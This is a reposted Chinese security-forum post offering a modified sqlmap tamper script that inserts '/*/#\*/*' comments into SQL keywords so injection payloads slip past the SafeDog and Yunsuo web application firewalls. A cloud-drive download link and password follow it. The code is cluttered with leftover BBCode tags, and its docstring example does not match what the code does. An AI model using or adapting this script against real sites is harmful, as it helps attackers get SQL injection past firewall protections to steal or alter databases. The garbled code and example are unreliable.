Sqlmap过狗过云锁注入脚本一枚
时间:2016-11-25 10:28 来源:转载 作者:Sinyer 点击:次
#!/usr/bin/env python[/color][/size] [size=3][color=lime]""" Copyright (c) 2006-2016 sqlmap developers ([/color][/size][url=http://sqlmap.org/][size=3][color=lime]http://sqlmap.org/[/color][/size][/url][size=3][color=lime]) See the file 'doc/COPYING' for copying permission """[/color][/size] [size=3][color=lime]import re[/color][/size] [size=3][color=lime]from lib.core.common import randomRange from lib.core.data import kb from lib.core.enums import PRIORITY[/color][/size] [size=3][color=lime]__priority__ = PRIORITY.LOW[/color][/size] [size=3][color=lime]def tamper(payload, **kwargs): """ Add random comments to SQL keywords[/color][/size] [size=3][color=lime] >>> import random >>> random.seed(0) >>> tamper('INSERT') 'I/**/N/**/SERT' """[/color][/size] [size=3][color=lime] retVal = payload[/color][/size] [size=3][color=lime] if payload: for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group()[/color][/size] [size=3][color=lime] if len(word) < 2: continue[/color][/size] [size=3][color=lime] if word.upper() in kb.keywords: _ = word[0][/color][/size] [size=3][color=lime] for i in xrange(1, len(word) - 1): _ += "%s%s" % ("/*/#\*/*" if randomRange(0, 1) else "", word[i])[/color][/size] [size=3][color=lime] _ += word[-1][/color][/size] [size=3][color=lime] if "/**/" not in _: index = randomRange(1, len(word) - 1) _ = word[:index] + "/*/#\*/*" + word[index:][/color][/size] [size=3][color=lime] retVal = retVal.replace(word, _)[/color][/size] [size=3][color=lime] return retVal[/color][/size] [size=3][color=lime] 下载地址: 链接: http://pan.baidu.com/s/1ge514X1 密码: i9jj (责任编辑:蜗蜗侠) |